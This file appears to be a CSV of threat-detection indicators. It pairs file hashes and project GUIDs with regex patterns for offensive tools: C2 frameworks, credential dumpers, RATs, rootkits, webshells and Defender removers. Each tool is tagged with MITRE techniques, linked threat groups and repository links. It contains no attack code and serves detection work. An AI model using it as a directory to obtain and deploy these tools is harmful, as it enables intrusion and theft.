"*2ce6ab2d48d613830f2cd7920ced86ca7b6782dbafe64af84ba476f71d08620e*",".{0,1000}2ce6ab2d48d613830f2cd7920ced86ca7b6782dbafe64af84ba476f71d08620e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23908"
"*2cea373bf30e78ea980ffcece278ef5a41df27484103e6e57cb0084e34a65a5f*",".{0,1000}2cea373bf30e78ea980ffcece278ef5a41df27484103e6e57cb0084e34a65a5f.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","23909"
"*2cf90c4ce3a4376653a8b7c236797ed5c3451134e05b299abd14629b8fab0a1b*",".{0,1000}2cf90c4ce3a4376653a8b7c236797ed5c3451134e05b299abd14629b8fab0a1b.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23910"
"*2CFB9E9E-479D-4E23-9A8E-18C92E06B731*",".{0,1000}2CFB9E9E\-479D\-4E23\-9A8E\-18C92E06B731.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","#GUIDproject","N/A","9","3","298","48","2024-10-29T07:30:35Z","2023-07-30T09:25:38Z","23912"
"*2d0029543e5781ba1136a85707546c7b3acafbaa56cf71e917c63cc2f7fea794*",".{0,1000}2d0029543e5781ba1136a85707546c7b3acafbaa56cf71e917c63cc2f7fea794.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","#filehash","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","23913"
"*2d00a5df9000f49c0b42ca0fe316103af9cc3bdf11bea4da5255690193d3ef21*",".{0,1000}2d00a5df9000f49c0b42ca0fe316103af9cc3bdf11bea4da5255690193d3ef21.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","#filehash","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","23914"
"*2d07b219eaa35bbe5dafe4b618f53b293d69779ed3596432a41c12ec14bc0b42*",".{0,1000}2d07b219eaa35bbe5dafe4b618f53b293d69779ed3596432a41c12ec14bc0b42.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23919"
"*2d171b19906b039677a1213f32d27a9e1e4a0b96e9e071f7a8e8bd8a72e46243*",".{0,1000}2d171b19906b039677a1213f32d27a9e1e4a0b96e9e071f7a8e8bd8a72e46243.{0,1000}","offensive_tool_keyword","keywa7","The tool that bypasses the firewall's Application Based Rules and lets you connect to anywhere","T1090.001 - T1071.004 - T1071.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/keywa7/keywa7","1","0","#filehash","N/A","6","1","61","9","2024-08-19T08:09:33Z","2024-08-05T15:27:26Z","23920"
"*2d212fbbfbf1e52bdd4a28a4a0957de7ab35357a0735279a0bfa3e6aecc0c145*",".{0,1000}2d212fbbfbf1e52bdd4a28a4a0957de7ab35357a0735279a0bfa3e6aecc0c145.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23921"
"*2d24b7562b9165724b631386fc3e2af255e42bddedb3b05a297cb2251ad64e0d*",".{0,1000}2d24b7562b9165724b631386fc3e2af255e42bddedb3b05a297cb2251ad64e0d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23922"
"*2d270f4d110fbbc9d8806632a588073376e4c5657485e484c863fc10aa0515dc*",".{0,1000}2d270f4d110fbbc9d8806632a588073376e4c5657485e484c863fc10aa0515dc.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23923"
"*2d2e0ad0b515712ae445a179701ae0e61d759498bea45c9431ae93c1469e1172*",".{0,1000}2d2e0ad0b515712ae445a179701ae0e61d759498bea45c9431ae93c1469e1172.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","#filehash","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","23924"
"*2d320664154077c143296da336e7ac4bcc3f639cee91734ec0e4689b782d17eb*",".{0,1000}2d320664154077c143296da336e7ac4bcc3f639cee91734ec0e4689b782d17eb.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23925"
"*2d3430ea4340df7c6d2e81b8147292f9423871efd5b0da115bd3e9bb7498e014*",".{0,1000}2d3430ea4340df7c6d2e81b8147292f9423871efd5b0da115bd3e9bb7498e014.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","23926"
"*2d35c7451ad9957e4a3c0cdccad1e8e9ac11a1c066cf0431ecf089b51ee8a763*",".{0,1000}2d35c7451ad9957e4a3c0cdccad1e8e9ac11a1c066cf0431ecf089b51ee8a763.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","23927"
"*2d3968ad60bdbc9528f95568aba38693ade0090f8d57707dc3e288d792587a35*",".{0,1000}2d3968ad60bdbc9528f95568aba38693ade0090f8d57707dc3e288d792587a35.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","23928"
"*2d3ce0b49997314a863aa4a9ef25fe06021aac1107aaf63af18ba9730f13e7e3*",".{0,1000}2d3ce0b49997314a863aa4a9ef25fe06021aac1107aaf63af18ba9730f13e7e3.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","23929"
"*2d4851e00169abc64ef2432424b1d8d0d41dd4b7ec143fb35d336f647530c82b*",".{0,1000}2d4851e00169abc64ef2432424b1d8d0d41dd4b7ec143fb35d336f647530c82b.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","23932"
"*2D4A23D2A7F25F007CB0B5E17F50B6B84C09560BFB3232B176E74AE4F97B3E89*",".{0,1000}2D4A23D2A7F25F007CB0B5E17F50B6B84C09560BFB3232B176E74AE4F97B3E89.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","23933"
"*2d578c9039ded100955310b7c6cc6a8eeb447cbabe86a7baa3b2c873795f26f8*",".{0,1000}2d578c9039ded100955310b7c6cc6a8eeb447cbabe86a7baa3b2c873795f26f8.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","23934"
"*2d5d11ca0c75a828e3345af626a7b45bde92e1425f5d4fb1c178b7751c5c38c4*",".{0,1000}2d5d11ca0c75a828e3345af626a7b45bde92e1425f5d4fb1c178b7751c5c38c4.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","23935"
"*2d6283f2487ebd6093546fc46eac56e5ce592c9ad5bfa70ee785ac0192a71d03*",".{0,1000}2d6283f2487ebd6093546fc46eac56e5ce592c9ad5bfa70ee785ac0192a71d03.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","23937"
"*2d64cabcf01bbdb919864475061ca0b5b14429faa6c1da87d575bfa0d56a9329*",".{0,1000}2d64cabcf01bbdb919864475061ca0b5b14429faa6c1da87d575bfa0d56a9329.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23938"
"*2d69f2dcc84e24a3b4f8c8a465f0b3b27f30ce4d24d81e96079deeec0d540f41*",".{0,1000}2d69f2dcc84e24a3b4f8c8a465f0b3b27f30ce4d24d81e96079deeec0d540f41.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","23940"
"*2d6fa1c8a808ef5f183950224a90249f798804b6634a6145f9506446076d39ea*",".{0,1000}2d6fa1c8a808ef5f183950224a90249f798804b6634a6145f9506446076d39ea.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23941"
"*2D6FDD44-39B1-4FF8-8AE0-60A6B0979F5F*",".{0,1000}2D6FDD44\-39B1\-4FF8\-8AE0\-60A6B0979F5F.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","23942"
"*2d7764b3561efab3e82c6f40f444e7700d5357ee4cf46cdf3233e37849153880*",".{0,1000}2d7764b3561efab3e82c6f40f444e7700d5357ee4cf46cdf3233e37849153880.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23943"
"*2d837b6c7343aec8123077db07d3fb8f9f7e44c5b108bf713380b17dac7569b9*",".{0,1000}2d837b6c7343aec8123077db07d3fb8f9f7e44c5b108bf713380b17dac7569b9.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","0","#filehash","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","23945"
"*2D863D7A-A369-419C-B4B3-54BDB88B5816*",".{0,1000}2D863D7A\-A369\-419C\-B4B3\-54BDB88B5816.{0,1000}","offensive_tool_keyword","UsoDllLoader","This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. It provides an alternative to the DiagHub DLL loading exploit ","T1210.001 - T1055 - T1574.001","TA0007 - TA0002 - TA0001","N/A","N/A","Exploitation tool","https://github.com/itm4n/UsoDllLoader","1","0","#GUIDproject","N/A","N/A","4","386","100","2020-06-06T11:05:12Z","2019-08-01T17:58:16Z","23946"
"*2d90f3530da1d697231e3a82df8a94b062676960dd7d32e0899c027cdf66350c*",".{0,1000}2d90f3530da1d697231e3a82df8a94b062676960dd7d32e0899c027cdf66350c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","23948"
"*2d93db2abb0ea20a402c5d62e610e36d1957069b8612f7fd05d6be0a1d362c3b*",".{0,1000}2d93db2abb0ea20a402c5d62e610e36d1957069b8612f7fd05d6be0a1d362c3b.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","#filehash","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","23951"
"*2d970264f004706b30aba04627024af60227bd9da276cf924912d6a18bce8567*",".{0,1000}2d970264f004706b30aba04627024af60227bd9da276cf924912d6a18bce8567.{0,1000}","offensive_tool_keyword","Dispossessor","socks tools used by the ransomware group Dispossessor","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","23952"
"*2d9b32c3eb9cdb1b9574f2e462eeb5724ae761adab5780f6d6168aea828c19b1*",".{0,1000}2d9b32c3eb9cdb1b9574f2e462eeb5724ae761adab5780f6d6168aea828c19b1.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","23954"
"*2da209fc877acf2adcbd7339bb759f38509ce4601bd8ed750648bf75cbed0e97*",".{0,1000}2da209fc877acf2adcbd7339bb759f38509ce4601bd8ed750648bf75cbed0e97.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23955"
"*2da7517e0a483825eea29726da1398bee9b68e739151ed4febcd6ceee6b85e01*",".{0,1000}2da7517e0a483825eea29726da1398bee9b68e739151ed4febcd6ceee6b85e01.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","23958"
"*2daeb177f86c873780c59e59fa8c424e45aea199bf5fb3e935310b043d41787f*",".{0,1000}2daeb177f86c873780c59e59fa8c424e45aea199bf5fb3e935310b043d41787f.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/cube0x0/CVE-2021-1675","1","0","#filehash","N/A","10","10","1879","582","2021-07-20T15:28:13Z","2021-06-29T17:24:14Z","23959"
"*2dba6fb126f4bdfc67fffd404746fe0dd38fc3fe7c72f97360df57b60e33155d*",".{0,1000}2dba6fb126f4bdfc67fffd404746fe0dd38fc3fe7c72f97360df57b60e33155d.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","23961"
"*2dbdee080a73de51397300d3d17317f6a20e81e57322ff8ede6979ce81349405*",".{0,1000}2dbdee080a73de51397300d3d17317f6a20e81e57322ff8ede6979ce81349405.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","23962"
"*2dc0932b1ec1f7be50038ddcfc69790ff8b8db824d0121a02aad709a9a92119f*",".{0,1000}2dc0932b1ec1f7be50038ddcfc69790ff8b8db824d0121a02aad709a9a92119f.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","23963"
"*2dd16e2f18bd45ff80eb56a524d3af4e87f55054fdb3ada3d2a097824b6487ac*",".{0,1000}2dd16e2f18bd45ff80eb56a524d3af4e87f55054fdb3ada3d2a097824b6487ac.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23964"
"*2dd2927d0f421a78f9289bee0e47449780a13ff7686a9d29c6afb0fec4c22576*",".{0,1000}2dd2927d0f421a78f9289bee0e47449780a13ff7686a9d29c6afb0fec4c22576.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","#filehash","N/A","10","7","N/A","N/A","N/A","N/A","23965"
"*2dd67e996df7577217a7fcc783610a7bb901655e1ce269157c6d935ea0dd510c*",".{0,1000}2dd67e996df7577217a7fcc783610a7bb901655e1ce269157c6d935ea0dd510c.{0,1000}","offensive_tool_keyword","Invoke-DNSteal","DNS Data Exfiltrator","T1071.004 - T1041 - T1048","TA0011 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/JoelGMSec/Invoke-DNSteal","1","0","#filehash","N/A","10","2","109","23","2023-07-17T11:26:19Z","2021-06-24T11:03:09Z","23966"
"*2de3001b8720ed2ad3f7f25685172277a7032ddc098d2037860b4a067c0ba668*",".{0,1000}2de3001b8720ed2ad3f7f25685172277a7032ddc098d2037860b4a067c0ba668.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","23967"
"*2de627c776ab1a97d9ea2b3b16f63ef060cf4e0367f03861c85fec6106b2a7af*",".{0,1000}2de627c776ab1a97d9ea2b3b16f63ef060cf4e0367f03861c85fec6106b2a7af.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","#filehash","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","23968"
"*2deff2ca-c313-4d85-aeee-414bac32e7ae*",".{0,1000}2deff2ca\-c313\-4d85\-aeee\-414bac32e7ae.{0,1000}","offensive_tool_keyword","hotkeyz","Hotkey-based keylogger for Windows","T1056.001","TA0006  - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/yo-yo-yo-jbo/hotkeyz","1","0","#GUIDproject","N/A","9","1","21","1","2024-10-17T17:50:19Z","2024-06-03T21:23:16Z","23969"
"*2df52ae297704f333af2c7e29544d0c00fcbbccaeb343a8588f9792d482b75a0*",".{0,1000}2df52ae297704f333af2c7e29544d0c00fcbbccaeb343a8588f9792d482b75a0.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","23972"
"*2df9eb9a967a029221346b322e7861e6db914770fadb7e99fe98d4a37764d441*",".{0,1000}2df9eb9a967a029221346b322e7861e6db914770fadb7e99fe98d4a37764d441.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23974"
"*2dfdcda3ae74c0e2e3e65adc1cf65676b9e4cbf1d8832aff955c8bd24ea8d280*",".{0,1000}2dfdcda3ae74c0e2e3e65adc1cf65676b9e4cbf1d8832aff955c8bd24ea8d280.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","23977"
"*2e0515d20feeb3a1d5f368c85eaad188eb96d4beec0b38502413f5f7086e5857*",".{0,1000}2e0515d20feeb3a1d5f368c85eaad188eb96d4beec0b38502413f5f7086e5857.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23978"
